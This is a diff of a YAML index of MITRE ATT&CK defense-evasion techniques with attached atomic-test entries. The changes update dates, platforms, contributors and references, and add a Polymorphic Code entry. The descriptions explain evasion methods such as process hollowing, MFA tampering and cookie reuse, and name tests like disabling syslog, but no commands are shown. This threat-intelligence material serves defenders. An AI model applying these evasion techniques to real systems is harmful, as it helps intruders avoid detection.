       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.005
     atomic_tests: []
   T1562.001:
@@ -12217,7 +12310,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.001
     atomic_tests:
     - name: Disable syslog
@@ -12495,7 +12587,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:47.635Z'
       name: Modify System Image
       description: |-
         Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -12530,8 +12622,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574:
     technique:
@@ -12597,7 +12687,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.005:
     technique:
@@ -12623,7 +12712,7 @@ defense-evasion:
         Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
 
         A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:07:48.062Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Indicator Removal from Tools
       x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -12648,11 +12737,10 @@ defense-evasion:
       - Signature-based detection
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -12669,7 +12757,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -12679,7 +12766,7 @@ defense-evasion:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -12688,19 +12775,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -12748,11 +12833,12 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -12820,18 +12906,17 @@ defense-evasion:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1564.009:
@@ -12878,7 +12963,7 @@ defense-evasion:
         Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
 
         Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:10:23.890Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Resource Forking
       x_mitre_detection: "Identify files with the <code>com.apple.ResourceFork</code>
@@ -12900,7 +12985,6 @@ defense-evasion:
       - Gatekeeper
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027:
     technique:
@@ -12975,6 +13059,7 @@ defense-evasion:
       - 'Script: Script Execution'
       - 'File: File Creation'
       - 'Module: Module Load'
+      - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'File: File Metadata'
       - 'Process: OS API Execution'
@@ -13034,7 +13119,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027
     atomic_tests:
     - name: Decode base64 Data into Script
@@ -13072,7 +13156,7 @@ defense-evasion:
         name: sh
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -13101,24 +13185,26 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -13153,9 +13239,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.001:
     technique:
@@ -13178,7 +13261,7 @@ defense-evasion:
         url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
         description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
           Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-02-10T19:52:47.724Z'
       name: Invalid Code Signature
       description: |-
         Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -13196,8 +13279,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.006:
     technique:
@@ -13236,7 +13317,7 @@ defense-evasion:
         description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
           - Using virtual machines to persist and evade detections. Retrieved September
           22, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T22:21:59.708Z'
       name: Run Virtual Instance
       description: |-
         Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -13279,10 +13360,78 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.006
     atomic_tests: []
+  T1027.014:
+    technique:
+      modified: '2024-10-09T18:56:28.092Z'
+      name: Polymorphic Code
+      description: "Adversaries may utilize polymorphic code (also known as metamorphic
+        or mutating code) to evade detection. Polymorphic code is a type of software
+        capable of changing its runtime footprint during code execution.(Citation:
+        polymorphic-blackberry) With each execution of the software, the code is mutated
+        into a different version of itself that achieves the same purpose or objective
+        as the original. This functionality enables the malware to evade traditional
+        signature-based defenses, such as antivirus and antimalware tools.(Citation:
+        polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+        with polymorphic code to accomplish the intended effects, including using
+        mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+        [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+        File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+        polymorphic-medium)\n"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+      - TruKno
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      - 'File: File Creation'
+      - 'File: File Metadata'
+      x_mitre_defense_bypassed:
+      - Signature-based Detection
+      type: attack-pattern
+      id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+      created: '2024-09-27T12:28:03.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/014
+        external_id: T1027.014
+      - source_name: polymorphic-blackberry
+        description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+          27, 2024.
+        url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+      - source_name: polymorphic-sentinelone
+        description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+          and Challenges. Retrieved September 27, 2024.
+        url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+      - source_name: polymorphic-medium
+        description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+          Retrieved September 27, 2024.'
+        url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+      - source_name: polymorphic-linkedin
+        description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+          and hindering analysis: Packing up and unpacking stuff. Retrieved September
+          27, 2024.'
+        url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1134.005:
     technique:
       x_mitre_platforms:
@@ -13326,7 +13475,7 @@ defense-evasion:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -13351,8 +13500,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1599:
@@ -13383,7 +13530,7 @@ defense-evasion:
         Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
 
         When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:05:44.200Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Boundary Bridging
       x_mitre_detection: |-
@@ -13402,7 +13549,6 @@ defense-evasion:
       - System Access Controls
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1553:
     technique:
@@ -13497,11 +13643,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -13581,11 +13726,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:24:56.148Z'
       name: 'Signed Binary Proxy Execution: Regsvr32'
       description: |-
         Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -13650,12 +13794,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.010
     atomic_tests: []
   T1036.003:
     technique:
-      modified: '2023-09-14T21:12:48.411Z'
+      modified: '2024-09-12T19:30:45.065Z'
       name: 'Masquerading: Rename System Utilities'
       description: 'Adversaries may rename legitimate system utilities to try to evade
         security mechanisms concerning the usage of those utilities. Security monitoring
@@ -13704,8 +13847,8 @@ defense-evasion:
         external_id: T1036.003
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -13720,9 +13863,8 @@ defense-evasion:
         url: https://lolbas-project.github.io/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.003
     atomic_tests:
     - name: Masquerading as FreeBSD or Linux crond process.
@@ -13743,7 +13885,7 @@ defense-evasion:
         name: sh
   T1562.011:
     technique:
-      modified: '2023-04-12T22:46:33.995Z'
+      modified: '2024-10-16T20:12:44.962Z'
       name: Spoof Security Alerting
       description: |-
         Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -13755,7 +13897,7 @@ defense-evasion:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -13785,13 +13927,12 @@ defense-evasion:
         url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -13852,7 +13993,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1027.003:
@@ -13908,11 +14048,10 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -13936,11 +14075,10 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -13965,9 +14103,8 @@ defense-evasion:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -14047,7 +14184,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.009:
     technique:
@@ -14081,7 +14217,7 @@ defense-evasion:
       - source_name: LOLBAS Regasm
         url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
         description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:55:48.725Z'
       name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
       description: |-
         Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -14108,8 +14244,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.009
     atomic_tests: []
   T1553.004:
@@ -14204,7 +14338,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.004
     atomic_tests:
     - name: Install root CA on CentOS/RHEL
@@ -14296,43 +14429,20 @@ defense-evasion:
         elevation_required: true
   T1027.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
-      type: attack-pattern
-      created: '2020-03-16T15:30:57.711Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1027.004
-        url: https://attack.mitre.org/techniques/T1027/004
-      - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
-          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
-          campaign. Retrieved November 29, 2018.'
-        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
-        source_name: ClearSky MuddyWater Nov 2018
-      - source_name: TrendMicro WindowsAppMac
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
-        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
-          Info Stealer and Adware. Retrieved April 25, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-03T17:43:14.766Z'
       name: 'Obfuscated Files or Information: Compile After Delivery'
       description: |-
-        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
 
         Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor the execution file paths and command-line arguments
         for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
         suspicious behavior to reduce false positives from normal user and administrator
@@ -14341,9 +14451,14 @@ defense-evasion:
         and execution frameworks like Mono and determine if they have a legitimate
         purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
         should only be used in specific and limited cases, like for software development.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Creation'
@@ -14355,12 +14470,35 @@ defense-evasion:
       - Anti-virus
       - Binary Analysis
       - Static File Analysis
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Compiler software (either native to the system or delivered by the adversary)
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+      created: '2020-03-16T15:30:57.711Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
